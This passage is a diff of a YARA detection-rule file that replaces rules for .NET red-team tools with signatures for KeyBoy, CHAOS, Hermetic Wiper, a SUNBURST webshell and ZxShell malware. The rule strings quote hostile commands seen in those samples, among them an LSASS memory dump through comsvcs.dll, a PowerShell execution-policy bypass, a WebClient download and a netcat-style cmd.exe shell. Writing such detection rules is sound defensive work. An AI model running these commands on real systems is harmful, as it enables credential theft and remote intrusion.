+		$s6 = "rasauto32.ServiceMain" fullword ascii
+		$s7 = "del /q/f %s\\%s*" fullword ascii
+		$s8 = "szTmpDll:%s" fullword ascii
+		$s9 = "lpCmdLine:%s" fullword ascii
+		$s0 = "ReleaseFileFromRes:%s ok!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "SSSS" ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpprinter : FILE
+rule SIGNATURE_BASE_Keyboy_876_0X4E20000 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "10270351-ad80-5330-971b-bc8f635f05f4"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/SharpPrinter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3243-L3256"
+		description = "Detects KeyBoy Backdoor"
+		author = "Markus Neis, Florian Roth"
+		id = "0b871f62-0f7c-5c94-9b3d-f68832ab64b4"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L128-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "86eb7194039aa8bb89f77041215a3421bb35acd790aa769156298f30a124e9b3"
+		logic_hash = "092bb19cd7a4250560ea71a3e54780a8fd34a229caa294e4cd5b6d522850d519"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334"
 
 	strings:
-		$typelibguid0lo = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii wide
+		$x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii
+		$x2 = "#%sCmd shell is not running,or your cmd is error!" fullword ascii
+		$x3 = "Take Screen Error,May no user login!" fullword ascii
+		$x4 = "Get logon user fail!" fullword ascii
+		$x5 = "8. LoginPasswd:%s" fullword ascii
+		$x6 = "Take Screen Error,service dll not exists" fullword ascii
+		$s1 = "taskkill /f /pid %s" fullword ascii
+		$s2 = "TClient.exe" fullword ascii
+		$s3 = "%s\\wab32res.dll" fullword ascii
+		$s4 = "%s\\rasauto.dll" fullword ascii
+		$s5 = "Download file:%s index:%d" fullword ascii
+		$s6 = "LogonUser: [%s]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evilfoca : FILE
+rule SIGNATURE_BASE_CHAOS_Payload : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2b2f5f6f-4224-5013-9e85-0ac088826bea"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/ElevenPaths/EvilFOCA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3258-L3271"
+		description = "Detects a CHAOS back connect payload"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5057bc68-9bf8-54b4-88a1-d0c0cba62fa0"
+		date = "2017-07-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/tiagorlampert/CHAOS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_chaos_payload.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f903e2552bdb75a985065e9b78229b56c8005041cf3a75be355192684582caee"
-		score = 75
+		logic_hash = "ca409d3d0430fbc4c5ae52ce22616132da3a90c1ec3889571c6314e8787eee67"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0962fcfcb1b52df148720c2112b036e75755f09279e3ebfce1636739af9b4448"
+		hash2 = "5c3553345f824b7b6de09ccb67d834e428b8df17443d98816471ca28f5a11424"
 
 	strings:
-		$typelibguid0lo = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii wide
+		$x1 = { 2F 43 48 41 4F 53 00 02 73 79 6E 63 2F 61 74 6F 6D 69 63 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poshc2_Misc : FILE
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Feb22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "245803cb-63d8-5c75-b672-912091cf4a80"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/nettitude/PoshC2_Misc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3273-L3287"
+		description = "Detects Hermetic Wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2cbe4a69-e31a-5f5f-ab1a-9d71d16fb30f"
+		date = "2022-02-24"
+		modified = "2023-12-05"
+		reference = "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L2-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ad0da62428f8412c748418b44d943a143191bbe789394ffc7b21658f87c27b9"
+		logic_hash = "1cf124f7533a060da8aff1a18f64a94b183502e58ffdfca012d72d99d30225ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da"
+		hash2 = "3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767"
+		hash3 = "2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf"
+		hash4 = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
 
 	strings:
-		$typelibguid0lo = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii wide
-		$typelibguid1lo = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii wide
+		$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
+               00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
+               00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
+               00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
+               00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
+               00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
+               00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
+               00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
+               00 6C 00 65 }
+		$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
+               00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
+               00 65 00 6D 00 33 00 32 }
+		$s1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
+		$s2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
+		$s3 = "DRV_XP_X64" wide fullword
+		$s4 = "%ws%.2ws" wide fullword
+		$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
+		$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a53 or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpire : FILE
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Artefacts_Feb22_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "32bdaa0f-3afc-5e0e-a20f-e21f33909af7"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xbadjuju/Sharpire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3289-L3302"
+		description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "77f793c1-b02c-59c3-b3e4-75758f5b3b8d"
+		date = "2022-02-25"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L40-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c53b3205e58257292e34526ea4fd0e0550bbdcf4039f94d268a313ae28733182"
+		logic_hash = "5e917618a5172c68b4b32ba9e63402c2a98ccb027276b317ec169a4fef219de1"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "39b75120-07fe-4833-a02e-579ff8b68331" ascii wide
+		$sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
+		$sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
+		$sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
+		$sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
+		$sx5 = "\\policydefinitions\\postgresql.exe" ascii wide
+		$sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
+		$sx7 = "powershell -exec bypass gp.ps1" ascii wide
+		$sx8 = "powershell -exec bypass -File link.ps1" ascii wide
+		$sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide
+		$sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
+		$sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
+		$sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
+		$fp1 = "<html" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of ( $sx* ) or all of ( $sa* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Smbexec : FILE
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6a1024af-734c-5974-af50-db51dbd694ff"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/checkymander/Sharp-SMBExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3304-L3317"
+		description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a628f773-9c71-5979-a4db-37b6b6bd6a56"
+		date = "2022-02-25"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L72-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d6938d7492904a202e80525ff8f1b95c19bd65b1450f2f7e4271ab01f2e25a50"
-		score = 75
+		logic_hash = "56368ba1c97fe3455312b6ee86dcd1a21677f7dfa3836e76ada4b236a5b2c171"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii wide
+		$a0 = "<Task version=" ascii wide
+		$sa1 = "CSIDL_SYSTEM_DRIVE\\temp" ascii wide
+		$sa2 = "postgresql.exe 1> \\\\127.0.0.1\\ADMIN$" ascii wide
+		$sa3 = "cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$a0 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Misctools : FILE
+rule SIGNATURE_BASE_SUSP_BAT_Aux_Jan20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ce49cc7b-a5a5-52b7-a7bf-bbb0c5b29b8a"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/MiscTools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3319-L3336"
+		description = "Detects BAT file often dropped to cleanup temp dirs during infection"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c97f189e-a0c2-532e-b087-8669da72a2ad"
+		date = "2020-01-29"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_bat_aux.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffa89aeac49c1652618def1b63506915ec6a364708eb805ef2d9abe710111edf"
-		score = 75
+		logic_hash = "6b8cd9b7683a18a02a81222d6819fe903500702c83f198f73ac428d1bc91fb9a"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f5d558ec505b635b1e37557350562ad6f79b3da5cf2cf74db6e6e648b7a47127"
 
 	strings:
-		$typelibguid0lo = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii wide
-		$typelibguid1lo = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii wide
-		$typelibguid2lo = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii wide
-		$typelibguid3lo = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii wide
-		$typelibguid4lo = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii wide
+		$s1 = "if exist \"C:\\Users\\" ascii
+		$s2 = "\\AppData\\Local\\Temp\\" ascii
+		$s3 = "del \"C:\\Users\\" ascii
+		$s4 = ".bat\"" ascii
+		$s5 = ".exe\" goto" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint8( 0 ) == 0x3a and filesize <= 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memorymapper : FILE
+rule SIGNATURE_BASE_LOG_APT_WEBSHELL_Solarwinds_SUNBURST_Report_Webshell_Dec20_2
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c978be10-315c-54e7-afea-f97e9a5f2d18"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/jasondrawdy/MemoryMapper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3338-L3351"
+		description = "Detects webshell access mentioned in FireEye's SUNBURST report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fb86164d-13de-5357-8f52-c597b51127ff"
+		date = "2020-12-21"
+		modified = "2023-12-05"
+		reference = "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_susp_sunburst.yar#L21-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "691aae2ac0c6dec88c64fd1195f67e34235514037c54ebd1f1ac04d92aa3bbb1"
+		logic_hash = "ec52e244a483ace0f6932b553b159b23b767c00d1f64a4711e5f359832e846f5"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii wide
+		$xr1 = /logoimagehandler.ashx[^\n\s]{1,400}clazz=/ ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$xr1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Vanillarat : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9448e8d0-5bfc-5683-b633-284e43d24642"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/DannyTheSloth/VanillaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3353-L3367"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a91e39bb-1bb3-54a8-b684-d673c445375c"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e3dd2e631b06201fa3065ebf10c1bb258839106443228af7f07706530a3070d"
+		logic_hash = "30195ff91bd62e32784040f9ec2cf72db90ef1c75056abfd9740f35ce1baccd9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ef56c2609bc1b90f3e04745890235e6052a4be94e35e38b6f69b64fb17a7064e"
 
 	strings:
-		$typelibguid0lo = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii wide
-		$typelibguid1lo = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii wide
+		$x1 = "CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++" ascii
+		$x2 = "system\\cURRENTcONTROLSET\\sERVICES\\tERMSERVICE" fullword ascii
+		$x3 = "\\secivreS\\teSlortnoCtnerruC\\METSYS" ascii
+		$x4 = "system\\cURRENTCONTROLSET\\cONTROL\\tERMINAL sERVER" fullword ascii
+		$x5 = "sOFTWARE\\mICROSOFT\\iNTERNET eXPLORER\\mAIN" fullword ascii
+		$x6 = "eNABLEaDMINtsREMOTE" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Unmanagedpowershell : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "49ff1362-0ac5-580d-97f3-516f2a10072b"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/leechristensen/UnmanagedPowerShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3369-L3382"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37c1f26b-4b4f-510e-a7b7-b2afb17d6e71"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L32-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "027b0dcbbacaafe6709e18a29b0c001f17f14128648cb64afdcf946804aa8796"
+		logic_hash = "d7c9f2af3842d60cf4b0b64bdb687a32014b449b42b101394e0424c12fc2808e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e"
 
 	strings:
-		$typelibguid0lo = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii wide
+		$u1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$u2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$u3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
+		$u4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$x1 = "\\\\%s\\admin$\\g1fd.exe" fullword ascii
+		$x2 = "C:\\g1fd.exe" fullword ascii
+		$x3 = "\\\\%s\\C$\\NewArean.exe" fullword ascii
+		$s0 = "at \\\\%s %d:%d %s" fullword ascii
+		$s1 = "%c%c%c%c%ccn.exe" fullword ascii
+		$s2 = "hra%u.dll" fullword ascii
+		$s3 = "Referer: http://%s:80/http://%s" fullword ascii
+		$s5 = "Accept-Language: zh-cn" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Quasar : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b938cf7d-27fd-5fa2-b0e5-d4da5670f3ef"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/quasar/Quasar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3384-L3398"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1900b861-b4a2-50b5-a639-3eb442072139"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L60-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51eed0545b985c20db7aae64251a0e7513cb352f2ff76f64d7697d2767f95db2"
+		logic_hash = "1d7dd59cf6ef24ce47431f9f3fbc980019880082b4e6162bae70b64abaa26db7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2e5cf8c785dc081e5c2b43a4a785713c0ae032c5f86ccbc7abf5c109b8854ed7"
 
 	strings:
-		$typelibguid0lo = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii wide
-		$typelibguid1lo = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii wide
+		$s1 = "%s\\nt%s.dll" fullword ascii
+		$s2 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpadidnsdump : FILE
+rule SIGNATURE_BASE_Zxshell_Jul17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "51d50b22-4e73-5378-9e0d-ad7730987293"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/b4rtik/SharpAdidnsdump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3400-L3413"
+		description = "Detects a ZxShell - CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b009b20-5a19-5cac-aaaf-ca61310eab9f"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "edda1bb7a0a1702941fa35b38120f7e9ae64b6188a47e63a0939a864980b6281"
+		logic_hash = "2c7467417ffc8b0ed3037ace9ce4183c9d4a90d1c087a420dd3c7a9c422621b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16"
 
 	strings:
-		$typelibguid0lo = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii wide
+		$x1 = "zxplug -add" fullword ascii
+		$x2 = "getxxx c:\\xyz.dll" fullword ascii
+		$x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
+		$x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
+		$x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
+		$x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
+		$x7 = "(bind a cmdshell)" fullword ascii
+		$x8 = "ZXFtpServer 21 20 zx" fullword ascii
+		$x9 = "ZXHttpServer" fullword ascii
+		$x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
+		$x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
+		$x12 = "AntiSniff -a wireshark.exe" fullword ascii
+		$x13 = "c:\\windows\\keylog.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 10000KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript : FILE
+
+rule SIGNATURE_BASE_Zxshell_20171211_Chrsben : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "31827074-fc63-5690-b6c7-8e89daacc07f"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/tyranid/DotNetToJScript"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3415-L3428"
+		description = "Detects ZxShell variant surfaced in Dec 17"
+		author = "Florian Roth (Nextron Systems)"
